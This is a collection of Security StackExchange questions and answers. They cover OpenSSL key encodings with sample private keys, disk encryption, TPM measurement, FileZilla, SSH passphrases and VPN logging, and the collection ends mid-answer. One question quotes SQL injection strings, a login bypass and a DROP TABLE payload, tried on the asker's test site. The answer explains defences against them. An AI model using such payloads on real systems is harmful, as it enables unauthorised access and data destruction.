144:d=1 hl=3 l= 129 prim: INTEGER :A88A4AF916F67452CF33632309F475AEC41B4508563FA24D9C12C215732C2DF6A151F55D378554A1A72C9640CB4FED6CFD9B481A98D17736A69F6FE32859CEBEBF0543D7F8DD45396F10E4E5C7303E1F5D28B1AD7D2F60E4FC850B827A14C05EC4AD8E466ACC2742B0A57D60876E4C7A328CBDA31BA401BC540AEE41DA614C19
276:d=1 hl=2 l= 65 prim: INTEGER :FABA766FE7810C9AE096A70F384D879029107117925B4388A1481DDAD2223C52FC1D23702AFBC0007F9004A2FA8EF79C2ECC099DE79CA27F198EC827E0AFC4A7
343:d=1 hl=2 l= 65 prim: INTEGER :D543BA5B5B62AFE1DC5E456C0438AFA70C4366669A130576DF2B46F01D133D7C0AEA1B1AF010CB7D6153F2275B49FE674A070AC220CA8C127821B044B3096113
410:d=1 hl=2 l= 64 prim: INTEGER :62835D01BEFE4F8B92EEDE98F65050116E710D5E6B9CFC3DF4D0B71A41323E6D84AD963CFE46883C29E2D64F8B0F1D6EFA5C24F32C0BB935233F9C993E891145
476:d=1 hl=2 l= 64 prim: INTEGER :1C735F9E266FE0F4E9B82DDCBE276DCF84444D99EC7E13218B9E33657F0B7D0D5A4B66F84E047F912775D27D4BA1706E09232D5D3E90A6E523DFA2AB57932DBF
542:d=1 hl=2 l= 65 prim: INTEGER :BE40317B635A382290C672EFB75A14BFA48FC29170F6A4330933AAC60601BA83D0F55533C2C742D90162B819D9842E13CCFB478F1F83F6E3F56C258E26BEEB50 We recognize here the components of a RSA private key: some big integers. See PKCS#1 for mathematical details. It so happens that the PEM-extended format that OpenSSL uses supports password-based encryption . After some code reading, it turns out that encryption uses CBC mode, with an IV and algorithm specified in the headers; and the password-to-key transform relies on EVP_BytesToKey() (defined in crypto\evp\evp_key.c ) with the following features: This is a non-standard hash-based key derivation function . The IV for encryption is also used as salt. The hash function is MD5. The hash is used repeatedly, for n iterations, but in the case of PEM encryption, the iteration count n is set to 1. That the KDF is non-standard is a source of worry. Reusing the encryption IV for a salt is a minor worry (that's mathematically unclean, but probably not a real problem -- and, at least, there is a salt). Use of MD5 is also a minor worry (though MD5 is thoroughly broken with regards to collisions, key derivation usually relies on preimage resistance , for which MD5 is still quite strong, almost as good as new). The iteration count set to 1 (which means, no loop at all) is a serious issue. This means that if an attacker tries to guess the password for a PEM-encrypted key, the computational cost for each try will be minimal. With a good GPU, that attacker could try several billions of passwords per second . That's way too fast for comfort. Password-based key derivation should be both salted and slow , and the OpenSSL PEM-encryption format fails on the second point. See this answer for a detailed discussion. Here is a PEM-encrypted private key; encryption algorithm was set to AES-128. The password is "1234": -----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,8680A1BEAE5661AAD8DA344B7495BCD4
4cvmuk8onrB5IQVRr6xRUBt6yRcjNUGcUWq0CcyX4p4iijANv/S7H5Ga8e5e+12m
k6UUt65mF54Ddh+WE4lHHy5yYEPa25tr/KBMErEhHJxYFiwRwgw/KoF2V8Cpgidd
BA5aeO+5/FmCiTkx/tGYbpE2emfcQ+oNdAKRhIEjIAfItrU4Bj2nQZdiiY0tFEfT
hn5HZ0X1i1yi63nxVGQH+oQQH9+ccPk87cIRLf3IK1B3M0J0j11XDhQdIXwAx9hV
52GXgkk0NX7EtT5Cq3x0Q513e70QA9ua1lt8yaCynkLrYKmMQQCKsLlJDSh+sUyu
ndiVl0g73cUPd962Tp/WCLOV4/DWShfZexfjoibjCkR81OVa9cguYITCXV3QGRCM
wo09DI/INOs1s6FS4ZKugpwgKEX6knh0Fo1i6DdVJQfeQvUo+MhbFjjK0SXT4QWc
4rlQv0Q1YoNn1EzFzsVwx7PhtU9wo4PU1978+582mrJBjteIN9a8z+7lZT1qKynD
BG3XUjnWAq4k5KUj5mEJkSSs2R2AIhHNiSmwmcuzHf67er1KrWvL+g8AXXJ8xLjh
P6ImJeMoEI7P2zb4FvSkQFF5SDjmaPNPpo6xe330EdSSWZTZtcgc9yH++I8ZX9Kb
0UnWic5HTZOx0VLqEqDw+iWufnUDMvq98tGD5c+BQqqofBZae5YNYfko1tCGoz/3
ZygMcOdRqRugur5SiCZnYCnIeQvVNi7nwfp2Bb3K0XMCr12IdeRDuoe45MzoG9zD
hLk0Y3VHS3eANvEsBMAwcyTBjgs8Q3bHdHwnPjVcAo3auOkyXUHZ7DEIxnmvVfaS
-----END RSA PRIVATE KEY----- Because of the encryption, the bytes can no longer be analysed with asn1parse . PKCS#8 is an unrelated standard for encoding private keys. It is actually a wrapper. A PKCS#8 object is an ASN.1 structure which includes some type information and, as a sub-object, a private key. The type information will state "this is a RSA private key". Since PKCS#8 is ASN.1-based, it results in non-printable binary, so OpenSSL will happily wrap it again in a PEM object. Thus, here is the same RSA private key as above, as a PKCS#8 object, itself PEM-encoded: -----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBANDfed0Ovk38AjzL
Y/OuoZtp0t5Ll9J/YaxUnHYHYrGFrMvbPk65+Kf7CMnWFbXb/NbJCz/0IVhAWuJ9
74+sxQ50uK2yaUPeXiUFDb35cqyY9pu0g08lDSfh3GAEZ4XFMJ3iUnCLKyZWxc+c
2uBBNzHaeKusiTULvBJb0CL1bd9lAgMBAAECgYEAqIpK+Rb2dFLPM2MjCfR1rsQb
RQhWP6JNnBLCFXMsLfahUfVdN4VUoacslkDLT+1s/ZtIGpjRdzamn2/jKFnOvr8F
Q9f43UU5bxDk5ccwPh9dKLGtfS9g5PyFC4J6FMBexK2ORmrMJ0KwpX1gh25MejKM
vaMbpAG8VAruQdphTBkCQQD6unZv54EMmuCWpw84TYeQKRBxF5JbQ4ihSB3a0iI8
UvwdI3Aq+8AAf5AEovqO95wuzAmd55yifxmOyCfgr8SnAkEA1UO6W1tir+HcXkVs
BDivpwxDZmaaEwV23ytG8B0TPXwK6hsa8BDLfWFT8idbSf5nSgcKwiDKjBJ4IbBE
swlhEwJAYoNdAb7+T4uS7t6Y9lBQEW5xDV5rnPw99NC3GkEyPm2ErZY8/kaIPCni
1k+LDx1u+lwk8ywLuTUjP5yZPokRRQJAHHNfniZv4PTpuC3cvidtz4RETZnsfhMh
i54zZX8LfQ1aS2b4TgR/kSd10n1LoXBuCSMtXT6QpuUj36KrV5MtvwJBAL5AMXtj
WjgikMZy77daFL+kj8KRcPakMwkzqsYGAbqD0PVVM8LHQtkBYrgZ2YQuE8z7R48f
g/bj9Wwljia+61A=
-----END PRIVATE KEY----- As you see, the type indicated in the PEM header is no longer "RSA PRIVATE KEY" but just "PRIVATE KEY". If we apply asn1parse on it, we get this: 0:d=0 hl=4 l= 631 cons: SEQUENCE
4:d=1 hl=2 l= 1 prim: INTEGER :00
7:d=1 hl=2 l= 13 cons: SEQUENCE
9:d=2 hl=2 l= 9 prim: OBJECT :rsaEncryption
20:d=2 hl=2 l= 0 prim: NULL
22:d=1 hl=4 l= 609 prim: OCTET STRING [HEX DUMP]:30820<skip...> (I have cut a lot of bytes in the last line). We see that the structure begins by an identifier which says "this is a RSA private key", and the private key itself is included as an OCTET STRING (and the contents of that string are exactly the ASN.1-based structure described above). PKCS#8 optionally supports password-based encryption . This is a very open format so it is potentially compatible with every password-based encryption system in the world, but software has to support it. OpenSSL supports old DES+MD5 encryption, or the newer PBKDF2 and a configurable algorithm. DES (not 3DES) is a minor issue: DES is relatively weak because of its small key size (56 bits) making a break through exhaustive search technologically feasible (it has been done); however, this would be quite expensive for an amateur. Still, it is better to use PBKDF2 and a better encryption algorithm. Given a raw private key as shown above, here is an OpenSSL command-line which turns it into a PKCS#8 object, with 3DES encryption and PBKDF2 for the password-based key derivation: openssl pkcs8 -topk8 -in keyraw.pem -out keypk8.pem -v2 des3 which yields: -----BEGIN ENCRYPTED PRIVATE KEY-----
MIICxjBABgkqhkiG9w0BBQ0wMzAbBgkqhkiG9w0BBQwwDgQIZT3rvVU85p0CAggA
MBQGCCqGSIb3DQMHBAgtYXWrNG+OYgSCAoCewt8WkgCDaBCSOoe88WTpV2haxUFW
iWkdJQtEkzkpYnwA0E0Bj5CBnSd3EdSRmup0rP9WxzdMe+qx2N+GGLTcmA7pMyBV
XK9OTdiixMWvlG64lrLFtQxoKaxo48zUVobLuRrtaVLvwZ7OpO4hA2zsl6qaWaV7
8GEiAWz28K3DIBDVr1CKpEdFf7epkC7e1/ojJDNAwPiE9rxkaqGHpogqJQKb5s8X
ZyGhVG3rPuwgOxhU5d1G7K6+N9wKYkZXiCmsoqZxD94M3QH8sM8YF41rxBsbPSJ/
7JgGQMOJQxxrdeHSAt5P1iasI7lNXa7HacTZl1nPDXpnpjKA5E/jNMf1EgV+sN3f
pL4GoFvw8zImOF4OHdo9KBz61oKFylQrGQM6WhCsTqsSVZxR0tH8ERSOhhWn2wmy
NgiagfVT4nED9XFInEwTKoXKUjTSOHUmbTl/HF637NrYjSBLgT/e+XBQBmFMSaNc
+KLlJRHpjB8QZ8cIdDFwVIYkmm4Po7h1uYob1d2/4saxjHrtZ8f7GqmT/SGXMpj5
eL0bXDXdjcapDkLx5X0/BYI3AYTlFXEZU0UJT8aad0Fiygw1bLVDR8yDl63Bthlb
gS15LhjqGYGhgX3tARS94HtBvlSAtgV6AB5QjEJfU7jgyu0lFn1hTULmwFJVkjj6
Oy2WeuHseOZ1X45V7DvNcS1iT7fttwQZoSvdks8WulsodpOr7sbtaJbsUUToTxIN
GtNQo9Ce/QAeONmSf8G9jbBURBmLH+kzzzptYcCsVaaUnWPpgebH/WJRa83quPw6
fwy3xZgg9pPHFBiFAG2c3Uuelat/eXhXdW74XlDgOIpmbMfsDxaVOiuM
-----END ENCRYPTED PRIVATE KEY----- So now that's an "ENCRYPTED PRIVATE KEY". Let's see what asn1parse can say about it: 0:d=0 hl=4 l= 710 cons: SEQUENCE
4:d=1 hl=2 l= 64 cons: SEQUENCE
6:d=2 hl=2 l= 9 prim: OBJECT :PBES2
17:d=2 hl=2 l= 51 cons: SEQUENCE
19:d=3 hl=2 l= 27 cons: SEQUENCE
21:d=4 hl=2 l= 9 prim: OBJECT :PBKDF2
32:d=4 hl=2 l= 14 cons: SEQUENCE
34:d=5 hl=2 l= 8 prim: OCTET STRING [HEX DUMP]:653DEBBD553CE69D
44:d=5 hl=2 l= 2 prim: INTEGER :0800
48:d=3 hl=2 l= 20 cons: SEQUENCE
50:d=4 hl=2 l= 8 prim: OBJECT :des-ede3-cbc
60:d=4 hl=2 l= 8 prim: OCTET STRING [HEX DUMP]:2D6175AB346F8E62
70:d=1 hl=4 l= 640 prim: OCTET STRING [HEX DUMP]:9EC2DF16920<skip...> We see there that PBKDF2 is used. The OCTET STRING with contents 653DEBBD553CE69D is the salt for PBKDF2. The INTEGER of value 0800 (that's hexadecimal for 2048) is the iteration count. Encryption itself uses 3DES in CBC mode, with its own randomly generated IV ( 2D6175AB346F8E62 ). That's fine. PBKDF2 uses SHA-1 by default, which is not an issue. It so happens that while OpenSSL supports somewhat arbitrary iteration counts (well, keep it under 2 billions to avoid issues with 32-bit signed integers), the openssl pkcs8 command-line tool does not allow you to change the iteration count from the default 2048, except to set it to 1 (with the -noiter option). So that's 2048 or 1, nothing else. 2048 is much better than 1 (say, it is 2048 times better), but it still is quite low by today's standard. Summary: OpenSSH can accept private keys in raw RSA/PEM format, RSA/PEM with encryption, PKCS#8 with no encryption, or PKCS#8 with encryption (which can be "old-style" or PBKDF2). For password protection of the private key, against attackers who could steal a copy of your private key file, you really want to use the last option: PKCS#8 with encryption with PBKDF2. Unfortunately, with the openssl command-line tool, you cannot configure PBKDF2 much; you cannot choose the hash function (that's SHA-1, and that's it -- and that's not a real problem), and, more importantly, you cannot choose the iteration count, with a default of 2048 which is a bit low for comfort. You could encrypt your key with some other tool, with a higher PBKDF2 iteration count, but I don't know of any readily available tool for that. This would be a matter of some programming with a crypto library. In any case, you'd better have a strong password. 15 random lowercase letters (easy to type, not that hard to remember) will offer 70 bits of entropy, which is quite enough to thwart attackers, even when bad password derivation is used (iteration count of 1). | {
"source": [
"https://security.stackexchange.com/questions/39279",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9786/"
]
} |
39,306 | How secure is the encryption offered by ubuntu (using the disk utility)? What algorithm is used underneath it? If someone could at least provide a link to some documentation or article regarding that I would be very grateful. Reference: | In a word: sufficient . This is block-level encryption, so it is filesystem-independent. Ubuntu's transparent encryption is done through dm-crypt using LUKS as the key setup. The built-in default for cryptsetup versions before 1.6.0 is aes-cbc-essiv:sha256 with 256-bit keys. The default for 1.6.0 and after ( released 14-Jan-2013 ) is aes-xts-plain64:sha256 with 512-bit keys. For older versions of cryptsetup : AES you certainly know; it's about as good a cipher as you could want. CBC is the chaining mode; not horrible but certainly not what I would pick for new projects: it has several issues but it can be used securely. ESSIV ("Encrypted salt-sector initialization vector") allows the system to create IVs based on a hash including the sector number and encryption key. This allows you to jump straight to to the sector you want without resorting to predictable IVs, and therefore protects you from watermarking attacks. SHA-256 is the hashing algorithm used for key derivation. LUKS uses PBKDF2 to strengthen the key for (by default) a minimum of 1000 iterations or 1/8 second, whichever is more. On a fast computer, expect around 200,000 iterations. With respect to security, you couldn't ask for a better arrangement. And with newer versions of cryptsetup : XTS is counter-oriented chaining mode. It's an evolution of XEX (actually: "XEX-based tweaked-codebook mode with ciphertext stealing"), while XEX ("xor-encrypt-xor") is a non-trivial counter-based chaining mode; neither of which I can claim to completely understand. XTS is already very widely supported and looks promising, but may have issues . The primary important details are these: No fancy IVs are necessary ( plain or plain64 is fine), and half of your key is used by XTS, meaning your original key must be twice as long (hence 512-bit instead of 256-bit). PLAIN64 is an IV generation mechanism that simply passes the 64-bit sector index directly to the chaining algorithm as the IV. plain truncates that to 32-bit. Certain chaining modes such as XTS don't need the IV to be unpredictable, while modes like CBC would be vulnerable to fingerprinting/watermarking attacks if used with plain IVs. Other options not used by default LRW has been largely replaced by XTS because of some security concerns , and is not even an option for most disk encryption products. benbi calculates a narrow-width block count using a shift register. It was built with LRW mode in mind. Altogether, this makes for a pretty tight system. It isn't the absolute best system theoretically possible, but it's pretty close. You should be able to trust it in any reasonable circumstances as long as your password is sufficient. Your attacker will almost certainly choose brute-forcing the password as his preferred attack method. | {
"source": [
"https://security.stackexchange.com/questions/39306",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28551/"
]
} |
39,310 | I've set up a test environment for running some SQL injection against my code and learning how to defend against it. I can bypass the login form using the following in the password field: ' OR username = 'admin Which gives me the query: SELECT * FROM customer_data WHERE username = '' AND password = '' OR username = 'admin' This works fine, but I'm having trouble with dropping a table. I've tried various attempts along the lines of inserting something like this in the password field: OR '1' = '1'; DROP TABLE temp; -- I created a table called temp just to try it against, but nothing I can think of has worked. If I log in to phpMyAdmin (same credentials as the page is using) I can manually run the query that would be constructed above and it works just fine. | Answering your question
mysql_query() doesn't support multiple queries, as documented: mysql_query() sends a unique query (multiple queries are not supported) to the currently active database on the server that's associated with the specified link_identifier. Which means that DROP TABLE temp; -- is never executed. It is, however, possible if you use mysqli::multi_query or PDO.
Best practice
Warning? You see that big red warning box? The mysql extension is in the process of deprecation and will throw warnings as of PHP 5.5.0. There are even plans to drop it completely in PHP 5.6 or PHP 6.0 source . Note that mysql_ isn't broken, as Ángel González stated: The extension is not broken. The problem is the bad usage. It can be used safely, and good developers have been doing so for ages, by creating php wrappers. With magic quotes, the work has been the opposite: developers had been detecting the feature in php and disabling it.
The new standard
The new standard is MySQLi or PDO . I won't compare the two extensions here, but there are really a bunch of good features, especially from PHP 5.3+, which will save you time and effort. Note that using MySQLi/PDO by itself won't protect you per se from SQL injections. The best option would be to use prepared statements . The data is sent separately from the query, thus making it impossible to inject values. This is well explained by Anthony Ferrara in this video .
Be careful
But wait, "impossible"? That sounds just too great :) Say for example we have two groups: group1 & group2. There is a certain php file deleteUser.php getting an id from $_GET . The prepared statement looks like this: DELETE FROM users WHERE id = ? . When the query is made with $_GET['id'] the user with ID = $_GET['id'] will get deleted. Hey, but that means that users from group1 could delete users from group2 by using that ID, which isn't intended. So we may change the query into something like DELETE FROM users WHERE id = ? AND group = ? and send along the group name the user is in with the query. In short: prepared statements won't protect you from logic flaws.
Multi query?
You don't need multi queries. If you want to do two things then do them separately; it will give you more control over your queries and make your code more readable. On another note: if you're dynamically creating and dropping tables you're most likely doing it wrong. You should design your database in such a way that this isn't needed. Of course there may be exceptions, but in those cases you should probably be looking at a NoSQL solution (another db engine) anyway.
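As a concrete illustration of the prepared-statement advice above, here is a minimal PDO sketch of the deleteUser.php example. The connection settings and the $currentUserGroup variable are placeholders made up for illustration, not part of your application:
<?php
// Hypothetical connection settings; adjust them to your environment
$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8', 'dbuser', 'dbpass');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// User input is bound as data and never concatenated into the SQL text;
// `group` is backticked here because it is a reserved word in MySQL
$stmt = $pdo->prepare('DELETE FROM users WHERE id = ? AND `group` = ?');
$stmt->execute([$_GET['id'], $currentUserGroup]);
Even if an attacker submits something like ' OR '1'='1 as the id, it is treated as a plain value to compare against, not as SQL, so it cannot change the structure of the query.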
TL;DR
Stop using mysql_ functions and step over to MySQLi or PDO
Use prepared statements, note that it will not protect you from attacks if you don't secure the logic behind it
Don't use multi queries
Make a good DB design
If you want to train your hacking skills, you may check Vulnerable OS's? | {
"source": [
"https://security.stackexchange.com/questions/39310",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28535/"
]
} |
39,321 | Recently, an increasing number of people have started advising moving away from FileZilla. However, the only reason I can see for this is that FileZilla stores the connection information in a completely unencrypted form, but as Mozilla says - surely it is the job of the operating system to protect the configuration files? So, is there any other reason why I should no longer use FileZilla, as I've never had any problems with it? Somebody mentioned to me that the way it works isn't secure either, but I think they were just getting confused over the fact that FTP transmits passwords in plain text anyway. | FileZilla per se isn't inherently insecure. Yes, it's storing passwords in plaintext, but the alternatives are only slightly more secure. You see, encrypting the credentials requires an encryption key which needs to be stored somewhere. If malware is running under your user account, it has as much access as you (or any other application running at the same level) have, meaning it will also have access to the encryption keys, or the keys encrypting the encryption keys, and so on. Your best option here is to disable password storage in FileZilla, then start using KeePass to store your account credentials. There are also many guides on the Internet about how to integrate KeePass with FileZilla . Doing this, you're storing the encryption key somewhere malware doesn't have access to; you're storing the encryption key (or rather, the password from which the encryption key is derived) in your brain. Finally (and perhaps this is a bit outside the scope of your question), please make sure you move away from FTP in favor of SFTP . | {
"source": [
"https://security.stackexchange.com/questions/39321",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20099/"
]
} |
39,329 | I am trying to find out how the TPM performs an integrity measurement on a system. It is well-documented in the TPM specification how it seals the data it has measured in the PCRs and how it is updated. But what I can't find explained is how the TPM actually performs the integrity measurements that it is sealing in the first place. To know if the system is in a given state or not it has to measure it, but how does it do that? And what is it that it actually measures? Most papers seem to gloss over this, and I get the feeling that ready-for-storage-in-PCR data just appears out of the blue. | There are basically two ways of doing this: SRTM (Static Root of Trust for Measurements) and DRTM (Dynamic Root of Trust for Measurements).
SRTM takes place at system boot. The first thing executed at boot, called the Core Root of Trust for Measurements (CRTM), aka the BIOS boot block, will measure the BIOS and send the value (a hash) to the TPM into a location called Platform Configuration Register (PCR) 0 before executing it. Then the BIOS measures the next thing in the boot chain and, again, will store the value in a PCR of the TPM. This process is executed for each component in the boot sequence (PCI option ROM, boot loader, etc). TrustedGrub is a TPM aware boot loader that will send the proper measurements to the TPM. It is used to continue the chain of measurements (SRTM) from the BIOS up to the kernel.
DRTM is very different as it's something happening while the system is running. Intel's implementation is called Trusted Execution Technology ( TXT ) while AMD uses the name Secure Virtual Machine (SVM). The goal of DRTM is to create a trusted environment from an untrusted state. Technically, it creates a secure/clean state and will report (provide measurements – hashes in PCRs) on a piece of code someone wants to execute (aka the Measured Launch Environment - MLE). Typically, the MLE is an Operating System (kernel, userspace, etc). Without going into details, Intel's DRTM works by calling a set of new CPU instructions (SMX) which tell the CPU and the chipset to perform a very specific set of tasks (GETSEC) which ensure that nothing other than a special piece of code can run, i.e. the SINIT Authenticated Code Module ( ACM ). This part includes disabling all but one CPU and blocking/stopping everything currently running: all other processes, interrupts and I/O (via IOMMU , e.g. to avoid DMA attacks). Then, all CPUs rejoin in a clean state - anything executed before is discarded. At this point the signature of this special code (SINIT ACM) gets validated and its identity (hash measurement) is sent to the TPM in PCR 17. Afterwards, execution is passed to the ACM, which then measures the MLE and sends the measurement to the TPM in PCR 18. Finally, execution is passed to the MLE. Tboot is a tool created by Intel to do just that (DRTM) and an alternative to TrustedGrub (SRTM).
Here's an example of what PCR values look like with SRTM (TPM aware BIOS) but without a TPM aware boot loader (e.g. TrustedGrub) and without DRTM (e.g. Tboot): # cat /sys/devices/pnp0/00:09/pcrs
PCR-00: A8 5A 84 B7 38 FC C0 CF 3A 44 7A 5A A7 03 83 0B BE E7 BD D9
PCR-01: 11 40 C1 7D 0D 25 51 9E 28 53 A5 22 B7 1F 12 24 47 91 15 CB
PCR-02: A3 82 9A 64 61 85 2C C1 43 ED 75 83 48 35 90 4F 07 A9 D5 2C
PCR-03: B2 A8 3B 0E BF 2F 83 78 29 9A 5B 2B DF C3 1E A9 55 AD 72 36
PCR-04: 78 93 CF 58 0E E1 A3 8F DA 6F E0 3B C9 53 76 28 12 93 EF 82
PCR-05: 72 A7 A9 6C 96 39 38 52 D5 9B D9 12 39 75 86 44 3E 20 10 2F
PCR-06: 92 20 EB AC 21 CE BA 8A C0 AB 92 0E D0 27 E4 F8 91 C9 03 EE
PCR-07: B2 A8 3B 04 BF 2F 83 74 29 9A 5B 4B DF C3 1E A9 55 AD 72 36
PCR-08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-09: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-11: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-12: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-13: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-14: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-15: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-16: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-17: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-18: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-19: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-21: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-22: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
PCR-23: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 As you can see, PCRs 0-7 are filled, but PCRs 8 to 15 are empty - they are still reset to 0. Since DRTM hasn't been used, PCRs 17-22 are filled with 1s (f). The security of those mechanisms relies on the fact that PCR values cannot be set (or forged) but only extended ( TPM_Extend() ). This means that whenever a measurement is sent to a TPM, the hash of the concatenation of the current value of a PCR and the new measurement is stored (i.e. new_value = Hash(old_value || new_measurement) ). Obviously, there's a beginning to all of this: with SRTM, only the CRTM can reset PCRs 0 to 15 at boot; with DRTM, only the TXT instructions can reset PCRs 17 to 20 (when in locality 4 (SMX operations)). See this answer , this presentation or the specs for the details. It's important to understand that while the TPM collects those measurements, it does not take action on them - actually, it can't. The value of those measurements can only be seen with the seal() / unseal() / quote() operations: now that we have measurements in the TPM's PCRs, we can use the unseal() operation to reveal a secret which is only accessible if the correct PCR values are in the TPM - they are used as encryption keys. This basically means that a secret can only be accessed if the proper environment was loaded via SRTM (BIOS, bootloader, kernel, etc) or DRTM (SINIT and MLE (kernel, etc)). See this answer for more info. For further reading, I suggest this 101 and then this document. | {
"source": [
"https://security.stackexchange.com/questions/39329",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12675/"
]
} |
39,676 | If I have a passphrase-protected SSH private key, AND if this passphrase is sufficiently random and long (say, 20-, 30-, 40-characters long, or even more!), AND if I make this private key of mine publicly available on the Net THEN, will it be practically possible for someone to be able to decrypt my private key from its corresponding public key (the latter being publicly available anyway). My guess the answer is most likely going to be: "The decryption effort and time taken will be totally dependent on the
length and randomness of the passphrase chosen, and there is nothing
inherent in SSH authentication algorithms/protocols that would speed
up or slow down the decryption effort. Thus, in the current
state-of-decryption-art, a 20+ characters long passphrase should be
sufficient enough. Even Gmail et al are recommending passphrases much
smaller in length." But I'm not sure if this is the right answer, or if there are any other aspects to it that I need to worry about, etc. If this SSH private key is really not practically decryptable, then I intend to protect it with a VERY long passphrase and then forget all about securing the key itself. I, for example, could store it in my Gmail inbox (letting even Gmail team see it), or even upload it on my personal website for my easy retrieval (say, when I'm travelling). Etc. | It is not the length of the passphrase which matters, but its randomness; namely, how much different it could have been. Length makes room for randomness, but does not generate it. Symmetric encryption of SSH private keys is not very well designed; it relies on some old features of OpenSSL, which date from before password hashing was a properly understood problem. See this answer for a detailed analysis. Bottom-line is that attackers will be able to try potential passwords by the billion per second, unless you invest some effort into wrapping your key in a PKCS#8 object with PBKDF2 and enough rounds. If you generate your passphrase as a sequence of letters, each chosen randomly and uniformly, you will get 4.7 bits of entropy per letter (because 26 is approximately equal to 2 4.7 ). To reach a decent protection level (say, 100 bits), you will need 22 letters... If you prefer to generate meaningful words , say among a list of 2048 "common words", then you will get 11 bits per word, and 9 words will get you to 99 bits of entropy. There again, each word must be chosen randomly, uniformly, and independently of the other words. With PKCS#8 + PBKDF2 and one million rounds (OpenSSL would need some coaxing to produce that), you gain 20 bits (because 2 20 is approximately equal to one million). Remember that remembering , indeed, can be tricky. You will remember a very long passphrase, but only if you type it often enough. If you don't, then forgetfulness is almost guaranteed. I suggest that you print your very long passphrase and store it in a bank safe (print with a laser printer, not an inkjet printer: ink from the latter can fade away rather quick). Or, simpler, cut the middle man and print the key itself on the paper which you put in the bank safe. (*) Note: printing systems may keep a cached copy of past printing jobs. Removing all traces can be tricky. You could use a "manual printing" process with a pen and your hand... for really long-time storage, consider engraving on stone or some rust-resistant metal. | {
"source": [
"https://security.stackexchange.com/questions/39676",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9375/"
]
} |
39,729 | I've noticed a few requests like this to a Rails application I am maintaining: GET http://mydomain.com/?f=4&t=252751+++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%F3%E5%EC+%EF%F0%EE%EA%F1%E8+85.17.122.209:6188;+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4%EE%F0%EC%FB+%E4%EB%FF+%EE%F2%EF%F0%E0%E2%EA%E8;+Result:+GET-%F2%E0%E9%EC%E0%F3%F2%EE%E2+1;+%ED%E5+%ED%E0%F8%EB%EE%F1%FC+%F4%EE%F0%EC%FB+%E4%EB%FF+%EE%F2%EF%F0%E0%E2%EA%E8; It looks like an attempt to exploit some vulnerability to me, but I can't make sense out of what it's supposed to do, and it's kind of hard to google. Any insights would be appreciated. | The request parameter is encoded with Windows Codepage 1251 and contains an apparently harmless error message in Russian: используем прокси 85.17.122.209:6188; не нашлось формы для отправки; Result: GET-таймаутов 1; не нашлось формы для отправки; Roughly translated to English, the message reads: using proxy 85.17.122.209:6188; there were no forms to be sent; Result: GET-timeout 1; there were no forms to be sent; It surely does not look as if someone is trying to hack you. I would rather assume that something is trying to report an error and due to misconfiguration is calling your server instead of whatever is supposed to track or handle the problem. | {
"source": [
"https://security.stackexchange.com/questions/39729",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16358/"
]
} |
39,788 | I know there are 2 services of VPN (free and paid). Normally, free VPNs need money from somewhere and sometimes they can sell your information to any agency that needs it. Now, if we are talking about a paid VPN where they use encryption and don't keep any logs or information about the user, IP addresses, or what you're doing, how can a hacker be traceable? Then, the best hackers who have been caught must have been a free VPN, because they were too cheap to pay 7-10$/month or I'm missing something. An excerpt from the FAQs of one of these VPN services. They have it in the privacy policy. | Update/Note: This is not to discourage VPN usage. I personally use one of the providers mentioned below, and I'm very happy with it. The important point is not to have an illusion of being 100% protected by the VPN provider. If you do something bad enough that state actors are after you, the VPN provider aren't going to risk themselves for you. If those coming after you are motivated enough, they'll exert all possible legal (and not so legal) powers they have. Downloading torrents or posting on anarchist forums is probably not motivating enough, but death threats to up-high politicians on the other hand... If there's one thing to take from this post is this: Use common sense. I've researched this subject for more than 3 years*: Looking for VPN providers, reading through their Privacy Policy and Legal pages, contacting them, contacting their ISPs when possible, and I've concluded the following: I was able to find zero reputable/trustworthy and publicly-available (free or paid) VPN service provider that: Actually doesn't keep usage logs. Actually doesn't respond with your personal information when presented with a subpoena . I'm not exaggerating, absolutely none, zero, nada, nula, nulla, ciphr, cifra. * Obviously not a dedicated research for 3 years Update: Regarding "super awesome Swedish VPN service providers". Swedish service provider obey the 'Electronic Communications Act 2003 389' . Sections 5, 6, and 7 under "Processing of traffic data" completely protect your privacy, but go a little further and read section 8 The provisions of Sections 5 to 7 do not apply When an authority or a court needs access to such data as referred to in Section 5 to resolve disputes. For electronic messages that are conveyed or have been dispatched or ordered to or from a particular address in an electronic
communications network that is subject to a decision on secret
